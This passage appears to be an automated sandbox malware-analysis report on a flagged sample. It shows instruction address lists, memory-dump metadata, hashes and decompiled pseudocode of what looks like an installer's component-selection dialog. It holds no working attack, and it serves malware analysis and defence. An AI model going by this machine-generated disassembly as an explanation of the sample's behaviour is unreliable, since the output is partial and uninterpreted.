                                                                                                                        0x0040780a
                                                                                                                        0x0040780a
                                                                                                                        0x00407814
                                                                                                                        0x00407819
                                                                                                                        0x00407821
                                                                                                                        0x0040781d
                                                                                                                        0x0040781f
                                                                                                                        0x0040781f
                                                                                                                        0x00407827
                                                                                                                        0x00407829
                                                                                                                        0x00407830
                                                                                                                        0x0040783a
                                                                                                                        0x00407844
                                                                                                                        0x00407860
                                                                                                                        0x00407864
                                                                                                                        0x004076a9
                                                                                                                        0x004076af
                                                                                                                        0x004076b0
                                                                                                                        0x004076b2
                                                                                                                        0x004076b8
                                                                                                                        0x004076bb
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004076bb
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407846
                                                                                                                        0x00407846
                                                                                                                        0x00407846
                                                                                                                        0x0040784b
                                                                                                                        0x00407854
                                                                                                                        0x0040785d
                                                                                                                        0x00000000
                                                                                                                        0x0040785d
                                                                                                                        0x0040786a
                                                                                                                        0x0040786a
                                                                                                                        0x0040786d
                                                                                                                        0x00407874
                                                                                                                        0x00407877
                                                                                                                        0x00000000
                                                                                                                        0x0040769a
                                                                                                                        0x0040761a
                                                                                                                        0x0040761c
                                                                                                                        0x0040761c
                                                                                                                        0x00407620
                                                                                                                        0x00407623
                                                                                                                        0x00407624
                                                                                                                        0x00407624
                                                                                                                        0x00000000
                                                                                                                        0x0040761c
                                                                                                                        0x00407590
                                                                                                                        0x00407596
                                                                                                                        0x00000000

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                                                        • Instruction ID: 4d3fc1c80ea15bf86cc2801d6424e98614acddb7a54358772128df9d71e60e61
                                                                                                                        • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                                                        • Instruction Fuzzy Hash: C6C14871E042599BCF18CF68C8905EEBBB2BF88314F25866AD85677380D7347941CF95
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd
                                                                                                                        Yara matches
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNELBASE(?), ref: 02AD3203
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1029625771-0
                                                                                                                        C-Code - Quality: 96%
                                                                                                                        			E00404F06(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                                                                                        				struct HWND__* _v8;
                                                                                                                        				struct HWND__* _v12;
                                                                                                                        				long _v16;
                                                                                                                        				signed int _v20;
                                                                                                                        				signed int _v24;
                                                                                                                        				intOrPtr _v28;
                                                                                                                        				signed char* _v32;
                                                                                                                        				int _v36;
                                                                                                                        				signed int _v44;
                                                                                                                        				int _v48;
                                                                                                                        				signed int* _v60;
                                                                                                                        				signed char* _v64;
                                                                                                                        				signed int _v68;
                                                                                                                        				long _v72;
                                                                                                                        				void* _v76;
                                                                                                                        				intOrPtr _v80;
                                                                                                                        				intOrPtr _v84;
                                                                                                                        				void* _v88;
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				signed int _t198;
                                                                                                                        				intOrPtr _t201;
                                                                                                                        				intOrPtr _t202;
                                                                                                                        				long _t207;
                                                                                                                        				signed int _t211;
                                                                                                                        				signed int _t222;
                                                                                                                        				void* _t225;
                                                                                                                        				void* _t226;
                                                                                                                        				int _t232;
                                                                                                                        				long _t237;
                                                                                                                        				long _t238;
                                                                                                                        				signed int _t239;
                                                                                                                        				signed int _t245;
                                                                                                                        				signed int _t247;
                                                                                                                        				signed char _t248;
                                                                                                                        				signed char _t254;
                                                                                                                        				void* _t258;
                                                                                                                        				void* _t260;
                                                                                                                        				signed char* _t278;
                                                                                                                        				signed char _t279;
                                                                                                                        				long _t284;
                                                                                                                        				struct HWND__* _t291;
                                                                                                                        				signed int* _t292;
                                                                                                                        				int _t293;
                                                                                                                        				long _t294;
                                                                                                                        				signed int _t295;
                                                                                                                        				void* _t297;
                                                                                                                        				long _t298;
                                                                                                                        				int _t299;
                                                                                                                        				signed int _t300;
                                                                                                                        				signed int _t303;
                                                                                                                        				signed int _t311;
                                                                                                                        				signed char* _t319;
                                                                                                                        				int _t324;
                                                                                                                        				void* _t326;
                                                                                                                        
                                                                                                                        				_t291 = _a4;
                                                                                                                        				_v12 = GetDlgItem(_t291, 0x3f9);
                                                                                                                        				_v8 = GetDlgItem(_t291, 0x408);
                                                                                                                        				_t326 = SendMessageW;
                                                                                                                        				_v24 =  *0x434f28;
                                                                                                                        				_v28 =  *0x434f10 + 0x94;
                                                                                                                        				if(_a8 != 0x110) {
                                                                                                                        					L23:
                                                                                                                        					if(_a8 != 0x405) {
                                                                                                                        						_t301 = _a16;
                                                                                                                        					} else {
                                                                                                                        						_a12 = 0;
                                                                                                                        						_t301 = 1;
                                                                                                                        						_a8 = 0x40f;
                                                                                                                        						_a16 = 1;
                                                                                                                        					}
                                                                                                                        					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                                                                        						_v16 = _t301;
                                                                                                                        						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                                                                                                                        							if(( *0x434f19 & 0x00000002) != 0) {
                                                                                                                        								L41:
                                                                                                                        								if(_v16 != 0) {
                                                                                                                        									_t237 = _v16;
                                                                                                                        									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                                                                                                                        										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                                                                                                                        									}
                                                                                                                        									_t238 = _v16;
                                                                                                                        									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                                                                                                                        										_t301 = _v24;
                                                                                                                        										_t239 =  *(_t238 + 0x5c);
                                                                                                                        										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                                                                                                                        											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                                                                                                                        										} else {
                                                                                                                        											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								goto L48;
                                                                                                                        							}
                                                                                                                        							if(_a8 == 0x413) {
                                                                                                                        								L33:
                                                                                                                        								_t301 = 0 | _a8 != 0x00000413;
                                                                                                                        								_t245 = E00404E54(_v8, _a8 != 0x413);
                                                                                                                        								_t295 = _t245;
                                                                                                                        								if(_t295 >= 0) {
                                                                                                                        									_t94 = _v24 + 8; // 0x8
                                                                                                                        									_t301 = _t245 * 0x818 + _t94;
                                                                                                                        									_t247 =  *_t301;
                                                                                                                        									if((_t247 & 0x00000010) == 0) {
                                                                                                                        										if((_t247 & 0x00000040) == 0) {
                                                                                                                        											_t248 = _t247 ^ 0x00000001;
                                                                                                                        										} else {
                                                                                                                        											_t254 = _t247 ^ 0x00000080;
                                                                                                                        											if(_t254 >= 0) {
                                                                                                                        												_t248 = _t254 & 0x000000fe;
                                                                                                                        											} else {
                                                                                                                        												_t248 = _t254 | 0x00000001;
                                                                                                                        											}
                                                                                                                        										}
                                                                                                                        										 *_t301 = _t248;
                                                                                                                        										E0040117D(_t295);
                                                                                                                        										_a12 = _t295 + 1;
                                                                                                                        										_a16 =  !( *0x434f18) >> 0x00000008 & 0x00000001;
                                                                                                                        										_a8 = 0x40f;
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								goto L41;
                                                                                                                        							}
                                                                                                                        							_t301 = _a16;
                                                                                                                        							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                                                                        								goto L41;
                                                                                                                        							}
                                                                                                                        							goto L33;
                                                                                                                        						} else {
                                                                                                                        							goto L48;
                                                                                                                        						}
                                                                                                                        					} else {
                                                                                                                        						L48:
                                                                                                                        						if(_a8 != 0x111) {
                                                                                                                        							L56:
                                                                                                                        							if(_a8 == 0x200) {
                                                                                                                        								SendMessageW(_v8, 0x200, 0, 0);
                                                                                                                        							}
                                                                                                                        							if(_a8 == 0x40b) {
                                                                                                                        								_t225 =  *0x42d24c;
                                                                                                                        								if(_t225 != 0) {
                                                                                                                        									ImageList_Destroy(_t225);
                                                                                                                        								}
                                                                                                                        								_t226 =  *0x42d260;
                                                                                                                        								if(_t226 != 0) {
                                                                                                                        									GlobalFree(_t226);
                                                                                                                        								}
                                                                                                                        								 *0x42d24c = 0;
                                                                                                                        								 *0x42d260 = 0;
                                                                                                                        								 *0x434f60 = 0;
                                                                                                                        							}
                                                                                                                        							if(_a8 != 0x40f) {
                                                                                                                        								L90:
                                                                                                                        								if(_a8 == 0x420 && ( *0x434f19 & 0x00000001) != 0) {
                                                                                                                        									_t324 = (0 | _a16 == 0x00000020) << 3;
                                                                                                                        									ShowWindow(_v8, _t324);
                                                                                                                        									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                                                                                                                        								}
                                                                                                                        								goto L93;
                                                                                                                        							} else {
                                                                                                                        								E004011EF(_t301, 0, 0);
                                                                                                                        								_t198 = _a12;
                                                                                                                        								if(_t198 != 0) {
                                                                                                                        									if(_t198 != 0xffffffff) {
                                                                                                                        										_t198 = _t198 - 1;
                                                                                                                        									}
                                                                                                                        									_push(_t198);
                                                                                                                        									_push(8);
                                                                                                                        									E00404ED4();
                                                                                                                        								}
                                                                                                                        								if(_a16 == 0) {
                                                                                                                        									L75:
                                                                                                                        									E004011EF(_t301, 0, 0);
                                                                                                                        									_v36 =  *0x42d260;
                                                                                                                        									_t201 =  *0x434f28;
                                                                                                                        									_v64 = 0xf030;
                                                                                                                        									_v24 = 0;
                                                                                                                        									if( *0x434f2c <= 0) {
                                                                                                                        										L86:
                                                                                                                        										if( *0x434fbe == 0x400) {
                                                                                                                        											InvalidateRect(_v8, 0, 1);
                                                                                                                        										}
                                                                                                                        										_t202 =  *0x433edc; // 0x6c3640
                                                                                                                        										if( *((intOrPtr*)(_t202 + 0x10)) != 0) {
                                                                                                                        											E00404E0F(0x3ff, 0xfffffffb, E00404E27(5));
                                                                                                                        										}
                                                                                                                        										goto L90;
                                                                                                                        									}
                                                                                                                        									_t292 = _t201 + 8;
                                                                                                                        									do {
                                                                                                                        										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                                                                                        										if(_t207 != 0) {
                                                                                                                        											_t303 =  *_t292;
                                                                                                                        											_v72 = _t207;
                                                                                                                        											_v76 = 8;
                                                                                                                        											if((_t303 & 0x00000001) != 0) {
                                                                                                                        												_v76 = 9;
                                                                                                                        												_v60 =  &(_t292[4]);
                                                                                                                        												_t292[0] = _t292[0] & 0x000000fe;
                                                                                                                        											}
                                                                                                                        											if((_t303 & 0x00000040) == 0) {
                                                                                                                        												_t211 = (_t303 & 0x00000001) + 1;
                                                                                                                        												if((_t303 & 0x00000010) != 0) {
                                                                                                                        													_t211 = _t211 + 3;
                                                                                                                        												}
                                                                                                                        											} else {
                                                                                                                        												_t211 = 3;
                                                                                                                        											}
                                                                                                                        											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                                                                                                                        											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                                                                                        											SendMessageW(_v8, 0x113f, 0,  &_v76);
                                                                                                                        										}
                                                                                                                        										_v24 = _v24 + 1;
                                                                                                                        										_t292 =  &(_t292[0x206]);
                                                                                                                        									} while (_v24 <  *0x434f2c);
                                                                                                                        									goto L86;
                                                                                                                        								} else {
                                                                                                                        									_t293 = E004012E2( *0x42d260);
                                                                                                                        									E00401299(_t293);
                                                                                                                        									_t222 = 0;
                                                                                                                        									_t301 = 0;
                                                                                                                        									if(_t293 <= 0) {
                                                                                                                        										L74:
                                                                                                                        										SendMessageW(_v12, 0x14e, _t301, 0);
                                                                                                                        										_a16 = _t293;
                                                                                                                        										_a8 = 0x420;
                                                                                                                        										goto L75;
                                                                                                                        									} else {
                                                                                                                        										goto L71;
                                                                                                                        									}
                                                                                                                        									do {
                                                                                                                        										L71:
                                                                                                                        										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                                                                                                                        											_t301 = _t301 + 1;
                                                                                                                        										}
                                                                                                                        										_t222 = _t222 + 1;
                                                                                                                        									} while (_t222 < _t293);
                                                                                                                        									goto L74;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                                                                        							goto L93;
                                                                                                                        						} else {
                                                                                                                        							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                                                                                                                        							if(_t232 == 0xffffffff) {
                                                                                                                        								goto L93;
                                                                                                                        							}
                                                                                                                        							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                                                                                                                        							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                                                                                                                        								_t294 = 0x20;
                                                                                                                        							}
                                                                                                                        							E00401299(_t294);
                                                                                                                        							SendMessageW(_a4, 0x420, 0, _t294);
                                                                                                                        							_a12 = _a12 | 0xffffffff;
                                                                                                                        							_a16 = 0;
                                                                                                                        							_a8 = 0x40f;
                                                                                                                        							goto L56;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				} else {
                                                                                                                        					_v36 = 0;
                                                                                                                        					_v20 = 2;
                                                                                                                        					 *0x434f60 = _t291;
                                                                                                                        					 *0x42d260 = GlobalAlloc(0x40,  *0x434f2c << 2);
                                                                                                                        					_t258 = LoadImageW( *0x434f00, 0x6e, 0, 0, 0, 0);
                                                                                                                        					 *0x42d254 =  *0x42d254 | 0xffffffff;
                                                                                                                        					_t297 = _t258;
                                                                                                                        					 *0x42d25c = SetWindowLongW(_v8, 0xfffffffc, E00405513);
                                                                                                                        					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                                                                                        					 *0x42d24c = _t260;
                                                                                                                        					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                                                                                                                        					SendMessageW(_v8, 0x1109, 2,  *0x42d24c);
                                                                                                                        					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                                                                                                        						SendMessageW(_v8, 0x111b, 0x10, 0);
                                                                                                                        					}
                                                                                                                        					DeleteObject(_t297);
                                                                                                                        					_t298 = 0;
                                                                                                                        					do {
                                                                                                                        						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                                                                                                                        						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                                                                                                                        							if(_t298 != 0x20) {
                                                                                                                        								_v20 = 0;
                                                                                                                        							}
                                                                                                                        							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E0040657A(_t298, 0, _t326, 0, _t266)), _t298);
                                                                                                                        						}
                                                                                                                        						_t298 = _t298 + 1;
                                                                                                                        					} while (_t298 < 0x21);
                                                                                                                        					_t299 = _a16;
                                                                                                                        					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                                                                                                                        					_push(0x15);
                                                                                                                        					E00404499(_a4);
                                                                                                                        					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                                                                                                                        					_push(0x16);
                                                                                                                        					E00404499(_a4);
                                                                                                                        					_t300 = 0;
                                                                                                                        					_v16 = 0;
                                                                                                                        					if( *0x434f2c <= 0) {
                                                                                                                        						L19:
                                                                                                                        						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                                                                                                        						goto L20;
                                                                                                                        					} else {
                                                                                                                        						_t319 = _v24 + 8;
                                                                                                                        						_v32 = _t319;
                                                                                                                        						do {
                                                                                                                        							_t278 =  &(_t319[0x10]);
                                                                                                                        							if( *_t278 != 0) {
                                                                                                                        								_v64 = _t278;
                                                                                                                        								_t279 =  *_t319;
                                                                                                                        								_v88 = _v16;
                                                                                                                        								_t311 = 0x20;
                                                                                                                        								_v84 = 0xffff0002;
                                                                                                                        								_v80 = 0xd;
                                                                                                                        								_v68 = _t311;
                                                                                                                        								_v44 = _t300;
                                                                                                                        								_v72 = _t279 & _t311;
                                                                                                                        								if((_t279 & 0x00000002) == 0) {
                                                                                                                        									if((_t279 & 0x00000004) == 0) {
                                                                                                                        										 *( *0x42d260 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                                                                                        									} else {
                                                                                                                        										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                                                                                                                        									}
                                                                                                                        								} else {
                                                                                                                        									_v80 = 0x4d;
                                                                                                                        									_v48 = 1;
                                                                                                                        									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                                                                                        									_v36 = 1;
                                                                                                                        									 *( *0x42d260 + _t300 * 4) = _t284;
                                                                                                                        									_v16 =  *( *0x42d260 + _t300 * 4);
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							_t300 = _t300 + 1;
                                                                                                                        							_t319 =  &(_v32[0x818]);
                                                                                                                        							_v32 = _t319;
                                                                                                                        						} while (_t300 <  *0x434f2c);
                                                                                                                        						if(_v36 != 0) {
                                                                                                                        							L20:
                                                                                                                        							if(_v20 != 0) {
                                                                                                                        								E004044CE(_v8);
                                                                                                                        								goto L23;
                                                                                                                        							} else {
                                                                                                                        								ShowWindow(_v12, 5);
                                                                                                                        								E004044CE(_v12);
                                                                                                                        								L93:
                                                                                                                        								return E00404500(_a8, _a12, _a16);
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						goto L19;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}
                                                                                                                        0x00405399
                                                                                                                        0x0040539b
                                                                                                                        0x0040539f
                                                                                                                        0x004053af
                                                                                                                        0x004053b9
                                                                                                                        0x004053bb
                                                                                                                        0x004053be
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004053a1
                                                                                                                        0x004053a1
                                                                                                                        0x004053a7
                                                                                                                        0x004053a9
                                                                                                                        0x004053a9
                                                                                                                        0x004053aa
                                                                                                                        0x004053ab
                                                                                                                        0x00000000
                                                                                                                        0x004053a1
                                                                                                                        0x00405384
                                                                                                                        0x0040535f
                                                                                                                        0x004052a2
                                                                                                                        0x00000000
                                                                                                                        0x004052b8
                                                                                                                        0x004052c2
                                                                                                                        0x004052c7
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004052d9
                                                                                                                        0x004052de
                                                                                                                        0x004052ea
                                                                                                                        0x004052ea
                                                                                                                        0x004052ec
                                                                                                                        0x004052fb
                                                                                                                        0x004052fd
                                                                                                                        0x00405301
                                                                                                                        0x00405304
                                                                                                                        0x00000000
                                                                                                                        0x00405304
                                                                                                                        0x004052a2
                                                                                                                        0x00404f58
                                                                                                                        0x00404f5d
                                                                                                                        0x00404f66
                                                                                                                        0x00404f6d
                                                                                                                        0x00404f7f
                                                                                                                        0x00404f8a
                                                                                                                        0x00404f90
                                                                                                                        0x00404f9e
                                                                                                                        0x00404fb2
                                                                                                                        0x00404fb7
                                                                                                                        0x00404fc4
                                                                                                                        0x00404fc9
                                                                                                                        0x00404fdf
                                                                                                                        0x00404ff0
                                                                                                                        0x00404ffd
                                                                                                                        0x00404ffd
                                                                                                                        0x00405000
                                                                                                                        0x00405006
                                                                                                                        0x00405008
                                                                                                                        0x0040500b
                                                                                                                        0x00405010
                                                                                                                        0x00405015
                                                                                                                        0x00405017
                                                                                                                        0x00405017
                                                                                                                        0x00405037
                                                                                                                        0x00405037
                                                                                                                        0x00405039
                                                                                                                        0x0040503a
                                                                                                                        0x0040503f
                                                                                                                        0x00405045
                                                                                                                        0x00405049
                                                                                                                        0x0040504e
                                                                                                                        0x00405056
                                                                                                                        0x0040505a
                                                                                                                        0x0040505f
                                                                                                                        0x00405064
                                                                                                                        0x0040506c
                                                                                                                        0x0040506f
                                                                                                                        0x0040513f
                                                                                                                        0x00405152
                                                                                                                        0x00000000
                                                                                                                        0x00405075
                                                                                                                        0x00405078
                                                                                                                        0x0040507b
                                                                                                                        0x0040507e
                                                                                                                        0x0040507e
                                                                                                                        0x00405084
                                                                                                                        0x0040508d
                                                                                                                        0x00405090
                                                                                                                        0x00405094
                                                                                                                        0x00405097
                                                                                                                        0x0040509a
                                                                                                                        0x004050a3
                                                                                                                        0x004050ac
                                                                                                                        0x004050af
                                                                                                                        0x004050b2
                                                                                                                        0x004050b5
                                                                                                                        0x004050f3
                                                                                                                        0x0040511e
                                                                                                                        0x004050f5
                                                                                                                        0x00405104
                                                                                                                        0x00405104
                                                                                                                        0x004050b7
                                                                                                                        0x004050ba
                                                                                                                        0x004050c8
                                                                                                                        0x004050d2
                                                                                                                        0x004050da
                                                                                                                        0x004050e1
                                                                                                                        0x004050ec
                                                                                                                        0x004050ec
                                                                                                                        0x004050b5
                                                                                                                        0x00405124
                                                                                                                        0x00405125
                                                                                                                        0x00405131
                                                                                                                        0x00405131
                                                                                                                        0x0040513d
                                                                                                                        0x00405158
                                                                                                                        0x0040515b
                                                                                                                        0x00405178
                                                                                                                        0x00000000
                                                                                                                        0x0040515d
                                                                                                                        0x00405162
                                                                                                                        0x0040516b
                                                                                                                        0x004054fe
                                                                                                                        0x00405510
                                                                                                                        0x00405510
                                                                                                                        0x0040515b
                                                                                                                        0x00000000
                                                                                                                        0x0040513d
                                                                                                                        0x0040506f

                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?,000003F9), ref: 00404F1E
                                                                                                                        • GetDlgItem.USER32(?,00000408), ref: 00404F29
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
                                                                                                                        • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F8A
                                                                                                                        • SetWindowLongW.USER32(?,000000FC,00405513), ref: 00404FA3
                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
                                                                                                                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
                                                                                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
                                                                                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
                                                                                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00405000
                                                                                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                                                                                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                                                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                                                                                                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                                                                                                                          • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
                                                                                                                        • ShowWindow.USER32(?,00000005), ref: 00405162
                                                                                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
                                                                                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
                                                                                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
                                                                                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
                                                                                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
                                                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 00405330
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00405340
                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
                                                                                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 00405462
                                                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 004054EA
                                                                                                                        • GetDlgItem.USER32(?,000003FE), ref: 004054F5
                                                                                                                        • ShowWindow.USER32(00000000), ref: 004054FC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                        • String ID: $@6l$M$N
                                                                                                                        • API String ID: 2564846305-3836762863
                                                                                                                        • Opcode ID: dd942b7cbeaa18c8cf4828e28d43e61687b6a80dcb186ef465745c56d9013c5d
                                                                                                                        • Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
                                                                                                                        • Opcode Fuzzy Hash: dd942b7cbeaa18c8cf4828e28d43e61687b6a80dcb186ef465745c56d9013c5d
                                                                                                                        • Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 92%
                                                                                                                        			E00404658(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                                                                                                        				intOrPtr _v8;
                                                                                                                        				int _v12;
                                                                                                                        				void* _v16;
                                                                                                                        				struct HWND__* _t56;
                                                                                                                        				intOrPtr _t69;
                                                                                                                        				signed int _t75;
                                                                                                                        				signed short* _t76;
                                                                                                                        				signed short* _t78;
                                                                                                                        				long _t92;
                                                                                                                        				int _t103;
                                                                                                                        				signed int _t110;
                                                                                                                        				intOrPtr _t111;
                                                                                                                        				intOrPtr _t113;
                                                                                                                        				WCHAR* _t114;
                                                                                                                        				signed int* _t116;
                                                                                                                        				WCHAR* _t117;
                                                                                                                        				struct HWND__* _t118;
                                                                                                                        
                                                                                                                        				if(_a8 != 0x110) {
                                                                                                                        					if(_a8 != 0x111) {
                                                                                                                        						L13:
                                                                                                                        						if(_a8 != 0x4e) {
                                                                                                                        							if(_a8 == 0x40b) {
                                                                                                                        								 *0x42b234 =  *0x42b234 + 1;
                                                                                                                        							}
                                                                                                                        							L27:
                                                                                                                        							_t114 = _a16;
                                                                                                                        							L28:
                                                                                                                        							return E00404500(_a8, _a12, _t114);
                                                                                                                        						}
                                                                                                                        						_t56 = GetDlgItem(_a4, 0x3e8);
                                                                                                                        						_t114 = _a16;
                                                                                                                        						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
